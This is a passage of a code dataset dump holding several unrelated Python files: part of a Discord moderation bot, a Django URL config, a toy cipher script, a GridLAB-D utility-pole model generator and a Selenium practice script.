greenbot.managers.schedule import ScheduleManager\nfrom greenbot.managers.db import DBManager\nfrom greenbot.managers.redis import RedisManager\nfrom greenbot.managers.message import MessageManager\nfrom greenbot.managers.handler import HandlerManager\nfrom greenbot.managers.discord_bot import DiscordBotManager\nfrom greenbot.managers.command import CommandManager\nfrom greenbot.managers.twitter import TwitterManager\nfrom greenbot.managers.timeout import TimeoutManager\nfrom greenbot.migration.db import DatabaseMigratable\nfrom greenbot.migration.migrate import Migration\nfrom greenbot.functions import Functions\nfrom greenbot.filters import Filters\nimport greenbot.migration_revisions.db\nimport greenbot.utils as utils\n\nlog = logging.getLogger(__name__)\n\n\ndef custom_exception_handler(loop, context):\n # first, handle with default handler\n if \"exception\" in context:\n if context[\"exception\"] in [AssertionError, SystemExit]:\n return\n\n loop.default_exception_handler(context)\n log.error(context[\"message\"])\n\n\nclass Bot:\n \"\"\"\n Main class for the discord bot\n \"\"\"\n\n def __init__(self, config, args):\n self.config = config\n self.args = args\n self.private_loop = asyncio.get_event_loop()\n self.private_loop.set_exception_handler(custom_exception_handler)\n\n self.discord_token = self.config[\"main\"][\"discord_token\"]\n\n ScheduleManager.init(self.private_loop)\n\n DBManager.init(self.config[\"main\"][\"db\"])\n\n ActionParser.bot = self\n\n # redis\n redis_options = {}\n if \"redis\" in config:\n redis_options = dict(config.items(\"redis\"))\n RedisManager.init(**redis_options)\n utils.wait_for_redis_data_loaded(RedisManager.get())\n\n # SQL migrations\n try:\n with DBManager.create_dbapi_connection_scope() as sql_conn:\n sql_migratable = DatabaseMigratable(sql_conn)\n sql_migration = Migration(\n sql_migratable, greenbot.migration_revisions.db, self\n )\n sql_migration.run()\n except ValueError as error:\n log.error(error)\n\n HandlerManager.init_handlers()\n\n self.movienight_api = MovieNightAPI(self, self.config[\"wsc\"], self.config[\"wowza_cdn\"])\n\n HandlerManager.add_handler(\n \"parse_command_from_message\", self.parse_command_from_message\n )\n self.bot_name = self.config[\"main\"][\"bot_name\"]\n self.command_prefix = self.config[\"discord\"][\"command_prefix\"]\n self.settings = {\n \"discord_token\": self.discord_token,\n \"bot_name\": self.bot_name,\n \"command_prefix\": self.command_prefix,\n \"discord_guild_id\": self.config[\"discord\"][\"discord_guild_id\"],\n }\n\n HandlerManager.add_handler(\"discord_ready\", self.wait_discord_load)\n\n self.discord_bot = DiscordBotManager(\n bot=self,\n settings=self.settings,\n redis=RedisManager.get(),\n private_loop=self.private_loop,\n )\n self.twitter_manager = TwitterManager(self)\n self.filters = Filters(self, self.discord_bot)\n self.functions = Functions(self, self.filters)\n\n def psudo_level_member(self, db_session, member):\n user_level = 100\n user = User._create_or_get_by_discord_id(db_session, str(member.id), str(member))\n for role_id in self.roles:\n role = self.filters.get_role([role_id], None, {})[0]\n if not role:\n continue\n if role in member.roles:\n user_level = max(int(user_level), int(self.roles[role_id]))\n return max(user_level, user.level)\n\n @property\n def bot_id(self):\n return self.discord_bot.client.user.id\n\n async def wait_discord_load(self):\n self.roles = {}\n self.socket_manager = SocketManager(self.bot_name, self.execute_now)\n self.message_manager = MessageManager(self)\n self.timeout_manager = TimeoutManager(self)\n self.banphrase_manager = BanphraseManager(self)\n self.module_manager = ModuleManager(self.socket_manager, bot=self).load()\n\n self.commands = CommandManager(\n socket_manager=self.socket_manager,\n module_manager=self.module_manager,\n bot=self,\n ).load()\n await HandlerManager.trigger(\"manager_loaded\")\n\n # promote the admin to level 2000\n owner = self.config[\"main\"].get(\"owner_id\", None)\n if owner is None:\n log.warning(\n \"No admin user specified. See the [main] section in the example config for its usage.\"\n )\n else:\n with DBManager.create_session_scope() as db_session:\n owner = User._create_or_get_by_discord_id(db_session, str(owner))\n if owner is None:\n log.warning(\n \"The login name you entered for the admin user does not exist on twitch. \"\n \"No admin user has been created.\"\n )\n else:\n owner.level = 2000\n\n def execute_now(self, function, *args, **kwargs):\n self.execute_delayed(0, function, *args, **kwargs)\n\n def execute_delayed(self, delay, function, *args, **kwargs):\n ScheduleManager.execute_delayed(delay, function, *args, *kwargs)\n\n def execute_every(self, period, function, *args, **kwargs):\n ScheduleManager.execute_every(period, function, *args, **kwargs)\n\n def quit_bot(self):\n try:\n self.module_manager.disable_all()\n self.socket_manager.quit()\n except:\n pass\n \n self.private_loop.call_soon_threadsafe(self.private_loop.stop)\n sys.exit(0)\n\n def connect(self):\n self.discord_bot.connect()\n\n def start(self):\n self.private_loop.run_forever()\n\n async def ban(self, user, timeout_in_seconds=0, delete_message_days=0, reason=None):\n return await self.discord_bot.ban(\n user=user,\n timeout_in_seconds=timeout_in_seconds,\n delete_message_days=delete_message_days,\n reason=reason,\n )\n\n async def unban(self, user_id, reason=None):\n return await self.discord_bot.unban(user_id=user_id, reason=reason)\n\n async def kick(self, user, reason=None):\n return await self.discord_bot.kick(user=user, reason=reason)\n\n async def private_message(\n self, user, message=None, embed=None, file=None, ignore_escape=False\n ):\n if message is None and embed is None and file is None:\n return None\n return await self.discord_bot.private_message(\n user, message, embed, file, ignore_escape\n )\n\n async def say(self, channel, message=None, embed=None, file=None, ignore_escape=False):\n if message is None and embed is None and file is None:\n log.error(\"sent invalid message\")\n return None\n return await self.discord_bot.say(channel, message, embed, file, ignore_escape)\n\n async def parse_command_from_message(\n self, message, content, user_level, author, not_whisper, channel\n ):\n msg_lower = content.lower()\n if msg_lower[:1] == self.settings[\"command_prefix\"]:\n msg_lower_parts = msg_lower.split(\" \")\n trigger = msg_lower_parts[0][1:]\n msg_raw_parts = content.split(\" \")\n if trigger not in self.commands:\n if len(msg_lower_parts) < 1:\n return\n trigger += \" \" + msg_lower_parts[1] if len(msg_lower_parts) > 1 else \"\"\n if trigger not in self.commands:\n return\n msg_raw_parts = (\n msg_raw_parts[1:] if len(msg_raw_parts) > 1 else []\n )\n remaining_message = (\n \" \".join(msg_raw_parts[1:]) if len(msg_raw_parts) > 1 else \"\"\n )\n command = self.commands[trigger]\n extra_args = {\n \"trigger\": trigger,\n \"message_raw\": message,\n \"user_level\": user_level,\n \"whisper\": not not_whisper,\n }\n try:\n await command.run(\n bot=self,\n author=author,\n channel=channel if not_whisper else None,\n message=remaining_message,\n args=extra_args,\n )\n except Exception as e:\n log.error(f\"Error thrown on command {trigger}\")\n log.exception(e)\n\n async def add_role(self, user, role, reason=None):\n return await self.discord_bot.add_role(user, role)\n\n async def remove_role(self, user, role, reason=None):\n return await self.discord_bot.remove_role(user, role, reason)\n\n async def quit(self, bot, author, channel, message, args):\n await self.private_message(user=author, message=\"Quitting the bot!\")\n self.quit_bot()\n\n def apply_filter(self, resp, f):\n available_filters = {\n \"strftime\": _filter_strftime,\n \"timezone\": _filter_timezone,\n \"lower\": lambda var, args: var.lower(),\n \"upper\": lambda var, args: var.upper(),\n \"title\": lambda var, args: var.title(),\n \"capitalize\": lambda var, args: var.capitalize(),\n \"swapcase\": lambda var, args: var.swapcase(),\n \"time_since_minutes\": lambda var, args: \"no time\"\n if var == 0\n else utils.time_since(var * 60, 0, time_format=\"long\"),\n \"time_since\": lambda var, args: \"no time\"\n if var == 0\n else utils.time_since(var, 0, time_format=\"long\"),\n \"time_since_dt\": _filter_time_since_dt,\n \"urlencode\": _filter_urlencode,\n \"join\": _filter_join,\n \"number_format\": _filter_number_format,\n \"add\": _filter_add,\n \"or_else\": _filter_or_else,\n }\n if f.name in available_filters:\n return available_filters[f.name](resp, f.arguments)\n return resp\n\n def get_currency(self):\n return {\"name\": \"points\"}\n\n\ndef _filter_time_since_dt(var, args):\n try:\n ts = utils.time_since(utils.now().timestamp(), var.timestamp())\n if ts:\n return ts\n\n return \"0 seconds\"\n except:\n return \"never FeelsBadMan ?\"\n\n\ndef _filter_join(var, args):\n try:\n separator = args[0]\n except IndexError:\n separator = \", \"\n\n return separator.join(var.split(\" \"))\n\n\ndef _filter_number_format(var, args):\n try:\n return f\"{int(var):,d}\"\n except:\n log.exception(\"asdasd\")\n return var\n\n\ndef _filter_strftime(var, args):\n return var.strftime(args[0])\n\n\ndef _filter_timezone(var, args):\n return var.astimezone(timezone(args[0]))\n\n\ndef _filter_urlencode(var, args):\n return urllib.parse.urlencode({\"x\": var})[2:]\n\n\ndef lowercase_first_letter(s):\n return s[:1].lower() + s[1:] if s else \"\"\n\n\ndef _filter_add(var, args):\n try:\n return str(int(var) + int(args[0]))\n except:\n return \"\"\n\n\ndef _filter_or_else(var, args):\n if var is None or len(var) <= 0:\n return args[0]\n else:\n return var\n","sub_path":"greenbot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":11766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"561911839","text":"from django.conf.urls import url\nfrom . import views\n\n# Avoiding hardcode url\napp_name = 'product'\n\nurlpatterns = [\n # ~/product/\n url(r'^$', views.ProductView.as_view(), name='product'),\n\n # ~/product/\n url(r'^(?P[0-9]+)/$', views.DetailView.as_view(), name=\"detail\"),\n\n # ~/product/kids\n url(r'^kids/', views.KidsView.as_view(), name='kidsView'),\n\n # ~/product/add/\n url(r'^add/$', views.ProductCreate.as_view(), name='product-add'),\n\n # ~/product//\n url(r'^(?P[0-9]+)/update$', views.ProductUpdate.as_view(), name='product-update'),\n\n # ~/product//delete/\n url(r'^(?P[0-9]+)/delete/$', views.ProductDelete.as_view(), name='product-delete'),\n]","sub_path":"product/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"479939169","text":"import random\r\nalphabets= \"\"\"abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz'\"\"\"\r\n\r\ndef encrypt(message):\r\n global shift_generator\r\n encrypted=[]\r\n embeded=[]\r\n\r\n for shift in message:\r\n shift_generator = random.randint(1, 26)\r\n print(\"Shift: \", shift_generator)\r\n if shift in alphabets and shift.isalpha() and alphabets.index(shift)!=-1:\r\n old_position=alphabets.index(shift)\r\n new_position=old_position+shift_generator\r\n encrypted+=alphabets[old_position : new_position+1]\r\n else:encrypted += list(shift)\r\n return encrypted[-1]\r\n\r\n\r\n\r\n\r\ndef decrypt(encrypted):\r\n decrypted=[]\r\n for shift in encrypted:\r\n if shift in alphabets and shift.isalpha():\r\n old_position = alphabets.index(shift)\r\n new_position = old_position - shift_generator\r\n decrypted += alphabets[new_position]\r\n\r\n return decrypted\r\n\r\nif \"__name__==main\":\r\n message = input(\"Type message: \")\r\n encryption=encrypt(message)\r\n print(\"Encrypted Message: \", encryption, end=\"\")\r\n print(\"Decrypted Message: \",decrypt(encryption), end=\"\")\r\n\r\n\r\n\r\n","sub_path":"cipher.py","file_name":"cipher.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"526303090","text":"# Syntax: create_poles INPUTFILE OPTIONS ...\n\"\"\"Create poles for a GridLAB-D model\n\nSYNTAX\n\nShell:\n\n bash$ gridlabd create_poles INPUTFILE OPTIONS ...\n\nGLM:\n\n #gridlabd create_poles INPUTFILE OPTIONS ...\n\nPython:\n\n >>> import create_poles\n >>> create_poles.main(INPUTFILE,OPTIONS ...)\n\nOutput options:\n\n --include_network include the input network in the output\n GLM file\n \n --output=GLMNAME set the output GLM file name\n (default is /dev/stdout)\n \n --format={GLM,JSON} specify the output format (default is\n GLM)\n\nPole options:\n\n --ignore_length ignore the line length when computing pole\n locations\n \n --ignore_location ignore node latitude/longitude when\n computer pole locations\n \n --pole_type=CONFIGURATION_NAME set the pole type to use\n\n --pole_data=POLEDATA_CSV use CSV data of pole properties\n\n --mount_data=MOUNTDATA_CSV use CSV data for equipment and line mounts\n \n --spacing=FEET set the pole spacing in feet on overhead\n power lines\n\nWeather options:\n\n --weather=NAME name the weather object and do not\n download any weather data\n \n --location=LAT,LON specify the weather location\n \n --year=YEAR specify the weather year to use\n (default to use forecast weather)\n \n --timezone=TZSPEC specify the timezone (overrides default\n based on location)\n \n --include_weather obtain weather data for the year specified\n or realtime forecast\n\nDESCRIPTION\n\nThe `create_poles` subcommand automatically generates a pole model for a\nnetwork model and mounts the overhead lines and equipment to the newly\ncreated poles. The output is written to `/dev/stdout` unless the\n`--output=GLMNAME` option is given.\n\nThe `--pole_type=CONFIGURATION_NAME` and `--spacing=FEET` options are\nrequired. Configuration names may be obtained from the\n`pole_configuration.glm` library (see [[/Subcommand/Library]] for details on\nusing libraries.\n\nSome network models include latitude and longitude information. When this\ninformation is present, the line length information checked. If there is a\ndiscrepancy between these, a warning is printed and the latitude/longitude\ninformation is used. The `--ignore_length` option will suppress this\nwarning. The `--ignore_location` warning will cause the model to use the line\nlength data instead.\n\nThe `--include_network` adds a `#include \"FILENAME\"` directive in the output\nto ensure that the resulting GLM file contains all the objects required to\nrun the simulation, e.g.,\n\n $ gridlabd create_poles example.glm --output=model.glm --spacing=100 \\\n --pole_type=WOOD-EC-45/4 --weather=example\n $ gridlabd example.glm model.glm\n\nAlternative, when the input is a GLM, the two GLM files can be used together\nin a single command, e.g.,\n\n $ gridlabd create_poles example.glm --output=model.glm --spacing=100 \\\n --pole_type=WOOD-EC-45/4 --include_network --weather=example\n $ gridlabd model.glm\n\nThe python usage requires the options be provided as a keyword arguments where\nthe leading `--` is omitted, e.g., the command \n\n >>> gridlabd python\n >>> import create_poles\n >>> create_poles.main('example.glm',output='model.glm',spacing=100,\\\n pole_type='WOOD-EC-45/4',include_network=True,weather=example)\n\nis equivalent to\n\n $ gridlabd create_poles example.glm --output=model.glm --spacing=100 \\\n --pole_type=WOOD-EC-45/4 --include_network --weather=example\n\nPROPERTIES\n\nPole and pole_mount objects are created with the following default\nproperties:\n\n * pole\n - install_year: 2000\n - tilt_angle: 0 deg\n - tilt_direction: 0 deg\n * pole_mount\n height: 40 ft\n offset: 0 ft\n area: 0 sf\n direction: 0 deg\n weight: 0 lb\n\nThe properties may be set at the command line using the option\n`--TYPE.PROPERTY=VALUE`, e.g. `--pole.install_year=2010`.\n\nProperties may be associated with pole and mounts on specific lines using the\n`--pole_data=POLEDATA_CSV` options and `--mount_data=MOUNTDATA_CSV`. The\nformat of the CSV files must always include the line name in the `name`\ncolumn and the property values in columns using the property name. For\nexample,\n\n name,install_year,tilt_angle\n overhead_line1,2010,0\n overhead_line2,2010,0\n overhead_line3,2010,0\n\nAssigns the install year and tilt angle to all poles associated with the\nnamed lines. If a value is omitted, the property is deleted, which causes\nit to take on the default value.\n\nWEATHER\n\nIf `--include_weather` is specified, then the weather forecast data is linked\nbased on location, if any, and the clock is automatically set based on the\nweather window. If the `--weather_name` option is provided, all poles\ncreated will use the specified weather object instead of using downloaded\nweather, and the clock will not set. If the `--year` option is specified,\nthen the historical weather data for that year and location is used, and the\nclock is set to run the entire year. Without the `--year` specification, a\nrealtime weather forecast is used, and the clock is set to the forecast\nwindow. By default the timezone is determined from the location, unless the\n`--timezone=TZSPEC` option is used to override it. If `--ignore_location` is\nspecified, then the local system timezone specification is used.\n\nCAVEAT\n\nWhen saving to JSON, only the new pole data is included. Options that\nchange the clock or include networks and weather are ignored.\n\nSEE ALSO\n\n - Module powerflow pole and pole_mount\n - Subcommand nsrdb_weather and noaa_forecast\n\"\"\"\n\nimport sys, os, json, datetime, subprocess\nimport math, pandas\nfrom haversine import haversine, Unit\nimport nsrdb_weather\n\ndef error(msg,code=None):\n \"\"\"Display error message and exit with code\"\"\"\n print(f\"ERROR [create_poles]: {msg}\",file=sys.stderr)\n if code == None:\n return\n if type(code) is int:\n exit(code)\n raise Exception(f\"exit code '{code}' is not valid\")\n\ndef warning(msg):\n \"\"\"Display a warning message\"\"\"\n print(f\"WARNING [create_poles]: {msg}\",file=sys.stderr)\n\ndef syntax(code=None):\n \"\"\"Display syntax/help message\n\n Parameters:\n\n - code (int or None) Output to stdout if evaluates to False, otherwise output to stderr. \n If None, output full help, otherwise output only syntax line.\n If integer, exit with code\n\n Exceptions:\n\n - ValueError Type of code is not int or None\n \"\"\"\n if not code:\n output = (lambda x: print(x,file=sys.stdout))\n else:\n output = (lambda x: print(x,file=sys.stderr))\n if code == None:\n output(__doc__)\n else:\n output(f\"Syntax: gridlabd create_poles INPUTFILE OPTIONS ...\")\n if type(code) is int:\n exit(code)\n elif code != None:\n raise ValueError(f\"error code '{code}' is not valid\")\n\nspacing = None\npole_type = None\nweather_name = None\nlocation = None\nyear = None\ntimezone = None\nweather_locations = []\nproperties = {\n \"pole\" : dict(\n install_year = \"2000\",\n tilt_angle = \"0 deg\",\n tilt_direction = \"0 deg\",\n ),\n \"pole_mount\" : dict(\n height = \"40 ft\",\n offset = \"0 ft\",\n area = \"0 sf\",\n direction = \"0 deg\",\n weight = \"0 lb\",\n ),\n }\nproperty_data = {}\nequipment_data = {}\npole_nodes = {}\nshort_line_length = 10\n\ndef get_timezone():\n \"\"\"Get local timezone based on how datetime works\"\"\"\n tzlist = [\n \"EST+5EDT\",\n \"CST+6CDT\",\n \"MST+7MDT\",\n \"PST+8PDT\",\n \"AST+9ADT\",\n \"HST+10HDT\",\n ]\n now = datetime.datetime.now()\n tz = datetime.datetime.now(datetime.timezone.utc).astimezone().tzinfo.tzname(now)\n for tzspec in tzlist:\n if tz in tzspec:\n return tzspec\n return tz\n\ndef get_pole(model,name,line):\n \"\"\"Find (and possibly create) specified pole in the model\"\"\"\n if name in pole_nodes.keys():\n return get_pole(model,pole_nodes[name],line)\n\n global pole_type\n if name not in model[\"objects\"]:\n \n # create pole object\n model[\"objects\"][name] = {\n \"configuration\":pole_type,\n }\n pole = model[\"objects\"][name]\n\n # add weather link\n if weather_name:\n\n # link weather based on name given\n pole[\"weather\"] = weather_name\n\n # try location, if specified\n elif location:\n\n # link weather based on location\n pole[\"weather\"] = \"weather@\" + nsrdb_weather.geohash(*location)\n\n # try pole location, if any\n elif \"latitude\" in pole.keys() and \"longitude\" in pole.keys():\n lat = float(pole[\"latitude\"].split()[0])\n lon = float(pole[\"longitude\"].split()[0])\n if (lat,lon) not in weather_locations:\n weather_locations.append((lat,lon))\n pole[\"weather\"] = \"weather@\" + nsrdb_weather.geohash(lat,lon)\n\n # no weather\n else:\n error(f\"unable to identify weather for pole '{name}', missing required location information\",2)\n\n pole.update(properties[\"pole\"])\n if line in property_data.keys():\n for prop,value in property_data[line].items():\n if prop in pole.keys():\n if value in [None] or (type(value) is float and math.isnan(value)):\n del pole[prop]\n else:\n pole[prop] = value\n return model[\"objects\"][name]\n\ndef mount_line(model,pole,line,position):\n \"\"\"Connect line to pole\"\"\"\n global spacing\n poledata = get_pole(model,pole,line)\n poledata[position] = {\"class\":\"pole_mount\",\"equipment\":line,\"pole_spacing\":f\"{spacing} ft\"}\n poledata[position].update(properties[\"pole_mount\"])\n # if line in property_data.keys():\n # for prop,value in property_data[line].items():\n # if prop in poledata[position].keys():\n # if value in [None] or (type(value) is float and math.isnan(value)):\n # del poledata[position][prop]\n # else:\n # poledata[position][prop] = value\n return poledata\n\ndef mount_equipment(model,pole,name,position):\n \"\"\"Connect line to pole\"\"\"\n global spacing\n poledata = get_pole(model,pole,name)\n poledata[position] = {\"class\":\"pole_mount\",\"equipment\":name,\"pole_spacing\":f\"{spacing} ft\"}\n poledata[position].update(properties[\"pole_mount\"])\n if name in equipment_data.keys():\n for prop,value in equipment_data[name].items():\n if prop in poledata[position].keys():\n if value in [None] or (type(value) is float and math.isnan(value)):\n del poledata[position][prop]\n else:\n poledata[position][prop] = value\n return poledata\n\ndef write_object(otype,name,data,output,indent_level=0):\n \"\"\"Write object data in GLM\"\"\"\n indent = ' '*indent_level\n print(indent+f\"object {otype}\",file=output)\n print(indent+\"{\",file=output)\n print(indent+f\" name \\\"{name}\\\";\",file=output)\n for item,value in data.items():\n if item in [\"class\"]:\n continue\n if type(value) is dict:\n if \"class\" in value.keys():\n write_object(value[\"class\"],item,value,output,indent_level+1)\n else:\n print(indent+f\" {item} \\\"{value}\\\";\",file=output)\n print(indent+\"}\"+(';'*min(indent_level,1)),file=output)\n\ndef main(inputfile,**options):\n \"\"\"Main pole creation function\"\"\"\n # options\n global spacing\n global pole_type\n global location\n global weather_name\n global year\n global timezone\n global weather_locations\n ignore_length = False\n ignore_location = False\n include_network = False\n include_weather = False\n outputfile = \"/dev/stdout\"\n output_format = \"GLM\"\n output = sys.stdout\n for opt,value in options.items():\n if opt == \"spacing\":\n spacing = float(value)\n elif opt == \"ignore_length\":\n ignore_length = True\n elif opt == \"ignore_location\":\n ignore_location = True\n elif opt == \"include_network\":\n include_network = True\n elif opt == \"include_weather\":\n include_weather = True\n elif opt == \"output\":\n outputfile = value\n output = open(outputfile,\"wt\")\n elif opt == \"pole_type\":\n pole_type = value\n elif opt == \"weather\":\n weather_name = value\n elif opt == \"location\":\n location = list(map(lambda x:float(x),value.split(\",\")))\n if not location in weather_locations:\n weather_locations.append(location)\n elif opt == \"year\":\n year = int(value)\n elif opt == \"format\":\n output_format = value\n elif opt == \"timezone\":\n timezone = value\n elif opt == \"pole_data\":\n property_data.update(pandas.read_csv(value,index_col=[\"name\"],dtype=str,na_values='').to_dict('index'))\n elif opt == \"mount_data\":\n equipment_data.update(pandas.read_csv(value,index_col=[\"name\"],dtype=str,na_values='').to_dict('index'))\n else:\n found = False\n for otype in properties.keys():\n if opt.startswith(otype+\".\"):\n properties[otype][opt.split(\".\")[1]] = value\n found = True\n if not found:\n raise Exception(f\"options '{opt}={value}' is not valid\") \n if spacing == None:\n raise Exception(\"option for spacing is required\")\n if pole_type == None:\n raise Exception(\"option for pole_type is required\")\n\n # input\n if inputfile.endswith(\".glm\"):\n glmfile = inputfile\n jsonfile = inputfile.replace(\".glm\",\".json\")\n code = os.system(f\"gridlabd -C {glmfile} -o {jsonfile}\")\n if code != 0:\n error(f\"unable to compile '{glmfile}' into {jsonfile} (error code {code})\",2)\n elif inputfile.endswith(\".json\"):\n jsonfile = inputfile\n else:\n error(f\"main(inputfile='{inputfile}',options={options}): inputfile type not recognized\",1)\n with open(jsonfile,\"r\") as f:\n model = json.load(f)\n\n # process pole-mounted equipment in model and short lines\n objects = model[\"objects\"]\n poles = {}\n global pole_nodes\n for name in list(objects.keys()):\n data = model[\"objects\"][name]\n if \"from\" in data.keys() and \"to\" in data.keys() and \\\n ( not \"length\" in data.keys() or float(data[\"length\"].split()[0]) < short_line_length ):\n fromname = data[\"from\"]\n toname = data[\"to\"]\n\n # add pole to shared node list\n if not toname in pole_nodes.keys():\n pole_nodes[toname] = []\n pole_nodes[toname].append(fromname)\n\n # mount equipment on pole\n poles[f\"pole_{fromname}\"] = mount_equipment(model,f\"pole_{fromname}\",name,f\"mount_{name}\")\n\n # process overhead lines in model\n for name in list(objects.keys()):\n data = model[\"objects\"][name]\n if \"class\" in data.keys() and data[\"class\"] == \"overhead_line\":\n length = float(data[\"length\"].split()[0])\n fromname = data[\"from\"]\n toname = data[\"to\"]\n fromdata = objects[fromname]\n todata = objects[toname]\n\n # try to use lat/lon\n if not ignore_location:\n\n # lat/lon found\n if \"latitude\" in fromdata.keys() and \\\n \"longitude\" in fromdata.keys() and \\\n \"latitude\" in todata.keys() and \\\n \"longitude\" in todata.keys():\n\n # length of line based on lat/lon\n dist = haversine([float(fromdata[\"latitude\"]),float(fromdata[\"longitude\"])],\n [float(todata[\"latitude\"]),float(todata[\"longitude\"])],Unit.FEET)\n \n # check length\n if dist != length:\n\n # if ignore line length\n if ignore_length:\n\n # use length based on lat/lon\n abs(length-dist) > spacing/2\n\n # don't ignore length\n else:\n\n # print a warning\n warning(f\"overhead_line '{name}' length '{float(data['length'].split()[0])}' not within {spacing/2} ft of distance {length} from '{fromname}' to '{toname}' \")\n\n # place first pole\n poles[f\"pole_{fromname}\"] = mount_line(model,f\"pole_{fromname}\",name,f\"mount_{name}_{fromname}\")\n\n # place intermediate poles\n for position in range(int(spacing),int(length),int(spacing)):\n poles[f\"pole_{name}_{position}\"] = mount_line(model,f\"pole_{name}_{position}\",name,f\"mount_{name}_{position}\")\n\n # place last pole\n poles[f\"pole_{toname}\"] = mount_line(model,f\"pole_{toname}\",name,f\"mount_{name}_{toname}\")\n\n # process node-like equipment\n for name in list(objects.keys()):\n data = model[\"objects\"][name]\n if \"phases\" in data.keys() and \"nominal_voltage\" in data.keys() and \\\n not \"from\" in data.keys() and not \"to\" in data.keys() and \\\n not \"pole_\"+name in poles.keys() and name not in pole_nodes.keys() and \\\n name in equipment_data.keys():\n if not \"status\" in data.keys():\n error(f\"equipment '{name}' cannot be mounted because it does not have required status property\",3)\n poles[f\"pole_{name}\"] = mount_equipment(model,f\"pole_{name}\",name,f\"mount_{name}\")\n\n # write GLM output\n if outputfile.endswith(\".glm\") or output_format == \"GLM\":\n\n # generate GLM data from model\n print(f\"// automatically generated model from command `{' '.join(sys.argv)}` on {datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S %z')}\",file=output)\n if include_network:\n print(f\"#include \\\"{inputfile}\\\"\",file=output)\n rc = subprocess.run(\"gridlabd library get pole_configuration.glm\".split())\n if rc.returncode:\n warning(\"pole configuration library not found\")\n rc = subprocess.run(\"gridlabd library config get DATADIR\".split(),capture_output=True)\n print(f\"#include \\\"{rc.stdout.decode().strip()}/pole_configuration.glm\\\"\",file=output)\n \n # generate GLM clock\n if year:\n if not timezone:\n if not ignore_location:\n # TODO: get timezone from location service\n timezone = get_timezone()\n warning(f\"location-based timezone is not implemented, using default '{timezone}'\")\n else:\n timezone = get_timezone()\n if timezone != model[\"clock\"][\"timezone\"]:\n fix_timezones(model)\n else:\n timezone = model[\"clock\"][\"timezone\"]\n starttime = datetime.datetime(year,1,1,0,0,0).strftime(\"%Y-%m-%d %H:%M:%S\")\n stoptime = datetime.datetime(year+1,1,1,0,0,0).strftime(\"%Y-%m-%d %H:%M:%S\")\n print(\"clock\",file=output)\n print(\"{\",file=output)\n print(f\" timezone \\\"{timezone}\\\";\",file=output)\n print(f\" starttime \\\"{starttime} {timezone[0:3]}\\\";\",file=output)\n print(f\" stoptime \\\"{stoptime} {timezone[0:3]}\\\";\",file=output)\n print(\"}\",file=output)\n\n # add weather data and player\n if include_weather:\n\n # download NSRDB weather\n if not weather_locations:\n\n error(\"cannot include weather because the model does not contain location information\",2)\n\n elif year:\n\n for latlon in weather_locations:\n weather_name = \"weather@\" + nsrdb_weather.geohash(*latlon)\n weather_data = nsrdb_weather.getyears(year.split(\",\"),*latlon)\n nsrdb_weather.writeglm(weather_data,glm=output,name=weather_name,csv=weather_name+\".csv\")\n\n # download NOAA forecast\n else:\n\n for latlon in weather_locations:\n weather_name = \"weather_\" + nsrdb_weather.geohash(*latlon)\n glmname = weather_name + \".glm\"\n csvname = weather_name + \".csv\"\n print(f\"#python -m noaa_forecast -p={latlon[0]},{latlon[1]} -i=60 -g={glmname} -c={csvname} -n={weather_name}\",file=output)\n print(f\"#include \\\"{glmname}\\\"\",file=output)\n\n # generate GLM pole data\n for name,data in poles.items():\n write_object(\"pole\",name,data,output)\n\n # generate weather and player\n\n # write JSON output\n elif outputfile.endswith(\".json\") or output_format == \"JSON\":\n if include_network:\n warning(f\"option '--include_network' is ignored when using output format '{output_format}'\")\n if include_weather:\n warning(f\"option '--include_weather' is ignored when using output format '{output_format}'\")\n if year or timezone:\n warning(f\"options '--year' and '--timezone' are ignored when using output format '{output_format}'\") \n json.dump(model,output,indent=4)\n\n else:\n error(f\"output format '{output_format}' is not valid\",1)\n\n return\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 1:\n syntax(1)\n glmfile = None\n options = {}\n debug = False\n for arg in sys.argv[1:]:\n args = arg.split(\"=\")\n if type(args) is list and len(args) > 1:\n token = args[0]\n value = args[1]\n elif type(args) is list:\n token = args[0]\n value = None\n else:\n token = args\n value = None\n if token in [\"-h\",\"--help\",\"help\"]:\n syntax()\n elif token in [\"--debug\"]:\n debug = not debug\n elif token.endswith(\".glm\") or token.endswith(\".json\"):\n glmfile = token\n elif token.startswith(\"--\"):\n options[token[2:]] = value\n else:\n error(f\"'{arg}' is not valid\",1)\n if glmfile:\n try:\n main(glmfile,**options)\n except Exception as msg:\n if debug:\n raise\n else:\n error(msg,1)\n","sub_path":"tools/create_poles.py","file_name":"create_poles.py","file_ext":"py","file_size_in_byte":22723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"113680287","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.select import Select\nimport time\npath = \"C:\\\\dev\\\\\\driver\\\\chrome\\\\chromedriver.exe\"\nbase_url = \"https://learn.letskodeit.com/p/practice\"\ndriver = webdriver.Chrome(executable_path= path)\ndriver.maximize_window()\ndriver.get(base_url)\ndriver.implicitly_wait(5)\nradio_btn1 = driver.find_element(By.XPATH, \"//input[@id = 'bmwradio']\" )\nradio_btn1.click()\ntime.sleep(5)\nradio_btn2 = driver.find_element(By.XPATH, \"//input[@id ='hondaradio']\")\nradio_btn2.click()\ntime.sleep(5)\nradio_btn3 = driver.find_element(By.XPATH, \"//input[@id ='benzradio']\")\nradio_btn3.click()\nchk_box1 = driver.find_element(By.ID, \"bmwcheck\")\nchk_box1.click()\ntime.sleep(5)\nchk_box2 = driver.find_element(By.ID, \"benzcheck\")\nchk_box2.click()\ntime.sleep(5)\ndpdw = driver.find_element(By.ID, \"carselect\")\nsel = Select(dpdw)\nsel.select_by_value(\"bmw\")\ntime.sleep(5) 